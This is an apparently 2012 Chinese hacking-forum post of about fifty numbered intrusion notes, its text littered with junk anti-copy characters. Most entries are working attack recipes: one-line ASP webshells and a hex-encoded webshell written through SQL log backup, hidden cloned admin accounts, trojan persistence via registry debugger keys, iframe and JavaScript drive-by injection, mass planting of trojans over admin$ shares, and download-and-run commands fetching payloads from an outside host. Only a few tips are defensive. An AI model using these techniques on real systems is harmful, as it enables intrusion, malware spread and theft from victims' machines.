中国网络渗透测试联盟

标题: 一些笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:51
标题: 一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
" J9 ]: C$ c1 N1 \& U, d5 g& Zcacls C:\windows\system32 /G hqw20:R
- |% c; A, S& [. O4 j. x7 e思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入0 }5 E; M5 G/ d- |& l) a8 F. c6 [
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
2 N. Q- A* A6 ]7 m; F3 Q5 Z0 N- a# M
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
$ r9 d4 D. R. y: a7 }: n, t8 \: [# F% w$ ~5 F
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
6 ~1 R, o/ R5 W7 a4 ^* W. }5 i- T; t/ I) n: ]5 S! K
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
5 t$ }! a4 Q3 w3 B6 r; _3 G, k' d2 k, \+ \# U6 ?1 W& I2 D5 ?' x
5、利用INF文件来修改注册表
4 U4 T/ {2 m* s4 X  X: B6 e. Y% L3 g[Version]
# u/ g# p  k" lSignature="$CHICAGO$"6 Z0 C1 u6 I' s3 u
[Defaultinstall]4 t  U8 w& i, B4 a; G
addREG=Ating
+ B( {. I  m) N8 ~9 o[Ating]
, p* l' D! h0 v) {- S' X7 g$ D- pHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"0 E9 Q+ c2 Y5 k. u4 e
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:9 D# T/ K0 X* Z) Z
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径! q( d& d1 C) P$ W/ m! K6 O
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU* r: }3 |6 B) A) ?6 ~
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU+ ?; ^2 q" N! l) v6 L
HKEY_CURRENT_CONFIG 简写为 HKCC
! l. _2 b# H+ o. P6 T. s0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
. i- F0 w/ R$ T"1"这里代表是写入或删除注册表键值中的具体数据
( g& X" r1 V+ S9 W/ f, b5 h, s4 E% d( y% x
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,0 \4 {+ |/ v( p" R" v% M
多了一步就是在防火墙里添加个端口,然后导出其键值
, A2 }7 v6 y# a8 e6 r4 ?+ O[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
. {/ ~. I- j7 B9 w$ v5 Z  i. E; Q4 @
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
7 V) J, e2 {8 a: Q! N4 J& b0 p$ n  x在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
* U; r& r8 ~9 t8 D* `$ }0 E. y
' J1 h7 F7 g: A+ q; m& F8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。) ?7 y+ L/ Y3 x5 V: Z

4 k0 J4 R" `6 q9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,# |7 R% V( j$ M( W( H9 C1 n
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。# c+ q! ^" G9 k7 D

* |2 G# m. X4 z7 i0 F10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”; H4 w# K" ^; w! [! B
. i- G! p  [3 S; Z0 q# G1 A6 ~" R* q. M
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
- a* s+ M! Z4 G6 W用法:xsniff –pass –hide –log pass.txt
/ L- v1 S4 a' C1 z6 T! F
! n! u0 F: z3 ~2 X12、google搜索的艺术
# i# }! k# d9 c$ ]搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”  X& S$ |) f7 G: N8 }, j
或“字符串的语法错误”可以找到很多sql注入漏洞。4 P- O" g- b$ b# l% v6 q, N( z
4 x1 f! Y) l7 t& D( s5 h$ T3 q
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。  T& V$ \# v! H6 y
6 N2 U% c" R. e4 J
14、cmd中输入 nc –vv –l –p 1987* Q) Q- @5 W* I
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃. K$ l( ~5 e- a8 S6 g4 H4 t

5 z; c. q& v( i/ V6 }% `# [15、制作T++木马,先写个ating.hta文件,内容为0 S. e2 M  p' l+ @5 s' K! K
<script language="VBScript">
3 t  q& ]$ t+ J! |. Fset wshshell=createobject ("wscript.shell" )
( X* U0 M$ |3 Z% B  oa=wshshell.run("你马的名称",1). ^1 w+ e+ `  w5 m! }) f: N. w
window.close' n3 [: I4 j! z5 x2 N' C8 u8 V" V
</script>' v8 q: v. S9 S# W
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
% ^' J; [0 R; ^. i
& o4 X" a0 w* Y7 `- e% F. i16、搜索栏里输入  F# e# P1 v  G8 Z" b
关键字%'and 1=1 and '%'='- q8 N+ a: j3 \' s: k: A
关键字%'and 1=2 and '%'='' s, X% ?) J+ g# X; u9 k" `
比较不同处 可以作为注入的特征字符
/ k" d7 E, w* x) `; B9 }
+ H% `5 p- B- d/ l7 Y$ ]; V: Y17、挂马代码<html>) q6 c8 q/ e. i; A& {5 G
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
; g$ W; W* r- `* u</html>
! {1 O3 E7 S/ y& P
' C* u0 Q0 H2 v5 {8 V18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
0 @# s4 u* L$ ?- snet localgroup administrators还是可以看出Guest是管理员来。2 U9 R3 L  Q" q. I  R
) R( X' m  e, e. Y; `2 R
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等* S% c3 C! W: g/ s
用法: 安装: instsrv.exe 服务名称 路径
* ~; f# t% {* j: D/ T. S- {  D卸载: instsrv.exe 服务名称 REMOVE3 T. X5 f2 ~9 B/ z& @; i9 ~
. ^8 d5 C9 _) [7 j: q
0 ?' c7 t- l; h% s; S: A* Y3 V: E
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
/ W# m3 _% p' b( Q& u: @不能注入时要第一时间想到%5c暴库。6 g( X$ p1 G+ G; R2 U: n# F& r
* y3 V* e6 u- }" R; x
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~: M9 a/ _7 }; P! y
' e  _8 |$ F$ H: P; p
23、缺少xp_cmdshell时
. L2 W) J  h$ ]4 ?7 h尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'5 d) r( h' d( c0 T
假如恢复不成功,可以尝试直接加用户(针对开3389的); L+ W/ I3 W2 t" n' f2 u
declare @o int
7 a: f) s3 v" \3 Y1 Iexec sp_oacreate 'wscript.shell',@o out  K2 k: H( C5 @  R7 m0 e
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
$ h" L7 p+ k. K- _. G- P. i$ L3 h- a% v% u
24.批量种植木马.bat9 v6 ~& l3 Y" o
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中. X3 G: Y, Y/ r9 S( b  @; l
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
2 t) h( k5 j) J3 V& h扫描地址.txt里每个主机名一行 用\\开头
0 m3 C3 Y9 m+ T$ x. }8 t
2 G/ ]( A! h5 W( t' n6 C# M: ^25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
. m! d& A1 C9 t% c, d* c
2 I# C0 W. H% A, N. n26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.; @* ]. f7 ~8 Z$ Z1 g0 i' f% U
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.' Z8 P- e& D: [, H" L* s
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
' u  b$ ]# T7 B' P! y- ^) h. D, C- S! K& ^0 {7 K$ g4 F
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
- c( @) ~9 `7 W9 a2 z, s1 {0 _然后用#clear logg和#clear line vty *删除日志3 v5 m+ G$ E1 k6 l0 f# U

2 S' U1 \5 }0 g1 c; u28、电脑坏了省去重新安装系统的方法8 y* W3 U" w8 a: u* Y
纯dos下执行,6 \; A! {1 ^, _8 g% k
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config  b% M; U6 r7 `0 |! M7 ]
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config- d% M" W2 L& K6 s( E

/ s. ^# m% P1 [/ a& r. V29、解决TCP/IP筛选 在注册表里有三处,分别是:
. D$ ?6 I8 L& ?9 BHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip  x# j4 k3 d5 n  Z
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ F3 |* \' n" a4 ]: jHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip& w* S2 L! d- W5 X; H/ i2 T
分别用
  G! m4 }; a' c) p3 _regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip9 Q+ d6 a/ e" T7 o% N( ?
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
5 x8 W8 I, R, }regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
, }$ p1 I9 c, K$ W8 M3 B# f( R! R命令来导出注册表项
2 G9 L. v4 @7 g3 n然后把三个文件里的EnableSecurityFilters"=dword:00000001,* |% R; w) X* v$ C( L4 N
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用% P5 l. E* R: ^* G. C" Q# }5 Y/ x
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
' N+ }3 z7 |4 o* Y1 J3 ^3 b1 v& b$ a% F" F/ Z/ g  s
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U1 r9 R5 }3 f& I) G, N/ Y: j
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
: l" ?+ [( H' }5 X; Y9 }7 V- l& m+ L. j# }( H$ C) d4 [
31、全手工打造开3389工具
& u4 u  s, g( o9 }打开记事本,编辑内容如下:
$ V& G5 n0 R* j5 E, ]echo [Components] > c:\sql
1 t0 G5 t# ^1 Techo TSEnable = on >> c:\sql6 c* H; b/ U, K( B$ k9 [9 K
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q, K. Z0 G' ^& f6 @$ K0 H
编辑好后存为BAT文件,上传至肉鸡,执行" _6 y$ J2 Z$ a

- g( x+ F+ K) r: f+ ~32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
$ z8 a  f' A# `  w$ F- z9 R
( |2 X0 F1 E5 @( J3 p) X33、让服务器重启
; Q5 q9 z, L( l/ O( \" @( Z写个bat死循环:  X1 l, v, w% h/ b8 Q0 v
@echo off
4 ~6 `/ r0 ~* M: `7 i8 d+ M:loop1$ U! P$ A  U" ~) {. y6 [9 x
cls6 d5 Z2 A3 H6 \7 o
start cmd.exe
6 `+ g) F1 p4 U1 y/ X! fgoto loop1( p/ n7 b# _( b& d
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启- E' D; M; R  b8 k2 s. Z- l
$ n7 K- F  E& w  G) {# b
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,7 o% Z$ }6 V2 ?' [# G* g9 K! g
@echo off
* o( }6 o! |! n# w9 Y) Zdate /t >c:/3389.txt
& l! [5 K# g% P4 `  T. \; Vtime /t >>c:/3389.txt" g& S6 k: z% S% S7 n
attrib +s +h c:/3389.bat( A* }% Z, y) T& S
attrib +s +h c:/3389.txt
! W9 ?7 p+ @$ F3 k' r3 Anetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt. h/ b, B% X3 b+ D" d/ D
并保存为3389.bat$ i) o/ E0 H9 g9 E9 G
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号! i& J( B2 B7 q: W* C) O* q5 K
5 F4 ]: v3 U% r4 V) O, w
35、有时候提不了权限的话,试试这个命令,在命令行里输入:) a; ]2 T% U3 p" k- n+ q
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)2 Q+ ^* s4 b. a- D
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。4 L# s  Q& O: n6 G9 a
9 L: ?3 R# \) H1 g3 M/ N
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
0 Z4 L( v3 @+ b. c( becho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
8 g$ B- N/ \) Gecho 你的FTP账号 >>c:\1.bat //输入账号
. s1 \/ L  K5 e1 k+ I- T( A  o) eecho 你的FTP密码 >>c:\1.bat //输入密码7 a3 K2 k/ g4 `/ k, H: r
echo bin >>c:\1.bat //登入
- G, l$ X+ n" `: _echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么0 d) [" m2 u3 D7 k7 O) f$ s
echo bye >>c:\1.bat //退出8 r$ f6 h' Y/ x. B
然后执行ftp -s:c:\1.bat即可& f" H- g' Y3 {; \* T+ D. g/ s
; f) C- [% x- B8 }! u" v4 f- S% y
37、修改注册表开3389两法5 R( `4 \3 a* i' g0 m* c( C  G
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
$ U& @4 a1 i: I% Gecho Windows Registry Editor Version 5.00 >>3389.reg" ~6 y2 i/ q& G
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg+ G4 }* Y" e. p9 g7 j( K+ H3 l
echo "Enabled"="0" >>3389.reg
/ \: o0 g/ h9 M2 }' h+ E, Lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows; `3 e' u4 T- l/ s: c7 c* r
NT\CurrentVersion\Winlogon] >>3389.reg4 Q- w  h: S; B, p
echo "ShutdownWithoutLogon"="0" >>3389.reg
0 g, o+ @2 G$ `9 Techo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
3 U% D. |8 G, s3 F, b- T>>3389.reg; |+ I+ v8 }0 d: f8 A5 v6 B7 K
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg' G& z/ \6 Q0 `, p" L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
/ \9 h' I* U) C1 ~>>3389.reg1 ?" U# P9 x1 p' K2 C
echo "TSEnabled"=dword:00000001 >>3389.reg; Y$ i$ Z4 J2 T! S( {" t( l
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
: D+ d9 `9 y& Zecho "Start"=dword:00000002 >>3389.reg
9 h, L0 `" u% B/ wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]' z  k- o# `- f4 f4 `$ S+ u
>>3389.reg
2 a" Q/ ^) y2 Q8 w/ Gecho "Start"=dword:00000002 >>3389.reg
0 \: _1 i( j. M+ V! Oecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
# }% o; o0 h/ z) becho "Hotkey"="1" >>3389.reg. I( k9 M/ Z) ~0 X5 P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 P6 g  _% `1 f7 \% KServer\Wds\rdpwd\Tds\tcp] >>3389.reg
. ?( z; i- q$ f  l/ k- L& fecho "PortNumber"=dword:00000D3D >>3389.reg/ {3 ?& N, N1 |7 O0 u# m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" O7 r9 o* Q9 J2 `1 T5 X" P) h
Server\WinStations\RDP-Tcp] >>3389.reg
2 E1 L$ _( ]" `echo "PortNumber"=dword:00000D3D >>3389.reg7 M1 o; V* r/ f$ S( k* `. n  {
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
2 V+ _; X3 P# L% Z! x, _5 W(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)/ G0 k6 G' q$ y' B, w9 f3 ~2 p
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
* o: D% i( p7 W& j* C7 C(2)winxp和win2003终端开启
. V+ d& |0 [: E" W6 U用以下ECHO代码写一个REG文件:
' i2 n# R) B4 h# ]! c: n0 l  Gecho Windows Registry Editor Version 5.00>>3389.reg
  k3 N# \: O, decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
  r. h; ^: q' CServer]>>3389.reg6 P. Q; w1 z' o* a. {7 H6 P- \5 V
echo "fDenyTSConnections"=dword:00000000>>3389.reg
. z: z$ m  i7 }4 N& b" ^9 g! cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
  r1 E2 D; D/ F4 t' j/ a0 u+ kServer\Wds\rdpwd\Tds\tcp]>>3389.reg. d1 J8 q8 ^9 V7 A, {5 J2 m* R
echo "PortNumber"=dword:00000d3d>>3389.reg
! T4 i0 W# T" t7 h2 ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: _- U3 u. G% y  ^Server\WinStations\RDP-Tcp]>>3389.reg
1 f0 q" R/ d* k: Hecho "PortNumber"=dword:00000d3d>>3389.reg
, l5 x% t) b: X  i4 L5 c. K" Z然后regedit /s 3389.reg del 3389.reg! u9 r, T7 _! l# C* f3 R9 g
XP下不论开终端还是改终端端口都不需重启
7 }. D% E4 E5 \7 N% [0 l4 D  ?- F' K/ Y: ^
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃2 C( I  R7 l, x6 o; ?
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'8 ^' G$ K; @" h& F: `# w

4 K7 @! f) h3 {39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!2 G4 S, c8 K( L9 d1 Y0 P
(1)数据库文件名应复杂并要有特殊字符% Q& Q" j3 F' p7 s) u" m" I. p
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源! N, n/ t. Q2 d% g8 x; A
将conn.asp文档中的1 e7 K, o+ c8 A$ p$ z- |
DBPath = Server.MapPath("数据库.mdb")
9 ^8 o" R3 B2 y2 E8 u1 kconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath- a; W* u5 X( d& O) I, j7 `

! Q, ^9 L9 g1 l0 p* N修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
7 R: m" V  Y) z: y0 D( R& J6 o(3)不放在WEB目录里
% O: R- L. D/ `. l8 ^% i9 [% l* w2 {9 e. M% m6 O5 T
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
9 ~0 I1 _# v& t* M1 X3 ]3 g1 L可以写两个bat文件
1 t2 H% I, P4 }! v, J. H  t3 U* T2 X@echo off3 Z: S$ q7 X4 Y
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe: n( Z! G4 t0 o  S' X
@del c:\winnt\system32\query.exe2 h" T5 T& d( i. U7 d  r9 c
@del %SYSTEMROOT%\system32\dllcache\query.exe( Q" P& W+ o3 u
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的# e7 E6 j3 i- y+ K5 q& H: N

8 M# F) M0 X) I! R  A@echo off5 @2 A& i5 \. ~1 G* k0 K
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe+ c, `. o9 m* B' Q$ M  ~! Z3 }
@del c:\winnt\system32\tsadmin.exe' U5 o9 U6 e9 ?* V. H. }# s
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
* ]5 d' X7 `0 i/ F' }5 Q0 p9 a; D+ z0 Y; ~
41、映射对方盘符
) Q5 W2 e* _" t9 Atelnet到他的机器上,3 f, H1 u! T/ q$ i6 E
net share 查看有没有默认共享 如果没有,那么就接着运行
0 W- m( u" u' O% `0 C: d9 Q/ Lnet share c$=c:6 m& U3 [8 T, e9 h
net share现在有c$
0 u6 c- J3 N  n" n( X在自己的机器上运行
) Q2 E6 C5 Z1 q" ~( w. Y' Anet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K% `0 G  [1 Y, }, X
0 }+ p5 ~4 S9 y! u
42、一些很有用的老知识! J2 Y0 S7 `8 I8 P  d3 O
type c:\boot.ini ( 查看系统版本 )
8 X3 D5 l/ U% {+ N; Tnet start (查看已经启动的服务)0 a9 O) _6 S. M, P. B7 i: O
query user ( 查看当前终端连接 )9 _) T6 Y: @4 P
net user ( 查看当前用户 )% B- L3 p& S7 Z+ l, c
net user 用户 密码/add ( 建立账号 ); a/ d2 Q8 P3 ~& D6 S, I* x
net localgroup administrators 用户 /add (提升某用户为管理员)
3 u$ F, m' {  mipconfig -all ( 查看IP什么的 )
2 z, E6 E* u& V% e$ Snetstat -an ( 查看当前网络状态 )5 q; d$ Q) p3 x* n! T0 U, y
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
/ f8 H5 h8 V7 r& K( O克隆时Administrator对应1F4
# |3 Q: I* Y, |guest对应1F5/ ^& B4 V2 I* z7 |
tsinternetuser对应3E8
  P; M6 C# ~0 o5 T' i* I6 Q
8 ]- l$ u. {6 i1 ^/ s6 x& n43、如果对方没开3389,但是装了Remote Administrator Service
' l) b9 Y, o0 ^. C1 u. [$ _用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
+ o% c) E0 Y) P- U0 O解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
+ u( b) M3 f, `7 f0 U' {# n先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
# L2 f' O( {3 R6 P: O( _9 A. h9 c: P
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
- V, N6 j1 e/ d) f, c# T0 ?2 y1 m本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
8 Q5 o* q/ A& r
3 }- v# |  B: q3 Y45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
- s1 F  {! S- ]6 }$ A. F0 O5 Xecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
8 C  z5 K* O2 w% ^. V6 \' A^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =. H4 f8 P/ H8 b  x# D$ V
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =  C% t& X6 |3 [8 l4 b
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
! E2 j5 X- H1 r# l. t! e" N; P(这是完整的一句话,其中没有换行符)  B5 y& {5 e  @7 D, f8 |3 B
然后下载:
4 P6 N; l! W* h4 g* s9 j' ^cscript down.vbs http://www.hack520.org/hack.exe hack.exe
, [3 c- Q1 L7 Y' W# G3 m6 a& ~3 V& A% a9 W: L) t$ \$ Z2 _" c6 k
46、一句话木马成功依赖于两个条件:
. W0 c. S7 l$ S4 P* h! c+ g; w* m1、服务端没有禁止adodb.Stream或FSO组件
& h( p0 a# ^4 D# X; `8 l2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
0 Y* B: m' O% A6 m% v- `. ^' d2 R4 `: o/ {9 D  |8 A- z
47、利用DB_OWNER权限进行手工备份一句话木马的代码:3 s2 E2 o% l. Q" o- u
;alter database utsz set RECOVERY FULL--
# g1 T; r' H' [+ L/ y0 F;create table cmd (a image)--
; x$ |- X  x4 i  f2 A. e* I;backup log utsz to disk = 'D:\cmd' with init--
9 d, c! {' g/ N0 h;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--. b6 V& z" t" t! t
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
  z, U0 u: F, @3 s, G3 d2 X注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
8 H3 E$ d  A, n/ ]2 ]0 S3 I# n
; y' o. M& r) J; [: ^48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:# u& |7 t/ b4 E

6 b/ J# @: D" _% ?用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options- H1 W  [% D( Z
所有会话用 'all'。, o+ j( Y+ _$ X. o2 |( }, Y+ l( X% f
-s sessionid 列出会话的信息。! T9 h' s. O6 z" j/ g# K( @
-k sessionid 终止会话。
3 Z; u# O8 k! t0 s& K# f, p-m sessionid 发送消息到会话。9 H, [! f0 O( G" T& r+ E( i
8 X) h& J! Z( d% M
config 配置 telnet 服务器参数。7 N& a% K; \: L9 @

/ |6 m) ?5 V# kcommon_options 为:' R: `; n! p, k7 q0 ?
-u user 指定要使用其凭据的用户
& H9 Y# E8 j, S-p password 用户密码1 {& g, V6 P& R; a9 p. y
# z9 S* _+ F1 S: P
config_options 为:  D* Q3 s1 u" T# `* L
dom = domain 设定用户的默认域, H: X" j4 O4 P6 F* S) m% y
ctrlakeymap = yes|no 设定 ALT 键的映射4 z5 p, y- l* E( d! p! b2 o, c
timeout = hh:mm:ss 设定空闲会话超时值
! z4 E7 _' e, j/ G/ ytimeoutactive = yes|no 启用空闲会话。
* I3 V) t( B* P$ x8 J& }maxfail = attempts 设定断开前失败的登录企图数。3 M; I6 x6 ~$ i6 q( P3 S
maxconn = connections 设定最大连接数。- |, e' P6 \* U  w2 O$ ]/ D
port = number 设定 telnet 端口。& I* \) {; X) U+ v5 \7 q7 d: R
sec = [+/-]NTLM [+/-]passwd
0 @; G4 M* ]$ ^* Z: S设定身份验证机构; a; t' s" C* |+ v) W
fname = file 指定审计文件名。
! V" j/ }/ q1 `% I; V0 C1 `fsize = size 指定审计文件的最大尺寸(MB)。
6 Y0 e0 R% h, D- y5 dmode = console|stream 指定操作模式。) A' C4 s, w! J2 b# g
auditlocation = eventlog|file|both% M8 X9 J% b+ P) J+ n. z
指定记录地点7 C) v3 X$ x1 g2 C/ p6 y
audit = [+/-]user [+/-]fail [+/-]admin
. k: ?2 F5 _* l# b, C4 R" r$ S' Z, j3 u
! ^3 K4 O$ l7 C! U; ?49、例如:在IE上访问:0 S5 G( h  a! }; b! l) ~, y# z
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
8 J1 u, O5 U2 e" dhack.txt里面的代码是:
3 g" [9 k( u: A" Z<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">; A: R; n6 j$ T2 Q8 A  O8 n
把这个hack.txt发到你空间就可以了!2 b7 h# I" m4 s5 P3 ~1 W1 w! S& e
这个可以利用来做网马哦!  a7 M& ]( t$ B3 l1 E- a1 U; H, O3 }" q
+ o% ~- L- P% C5 s0 M! R, S& U* r
50、autorun的病毒可以通过手动限制!
# u1 ?2 {% V! u# V  O1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
+ f0 N# r* X5 O1 p8 e) u2,打开盘符用右键打开!切忌双击盘符~& ^8 ~' s" M. C$ W
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
% [9 l. h- X  g7 ~9 x5 R- F/ k* n4 _! J. O( h6 k4 ^3 }
51、log备份时的一句话木马:' W0 ^/ z6 d. k7 E
a).<%%25Execute(request("go"))%%25>0 F; _0 q: i6 N% \
b).<%Execute(request("go"))%>
$ W/ n* @! t; x0 E; P4 B' |c).%><%execute request("go")%><%* L/ }5 r6 k& k) C6 v7 W
d).<script language=VBScript runat=server>execute request("sb")</Script>7 A# @6 I: S/ b" |4 V, T
e).<%25Execute(request("l"))%25>
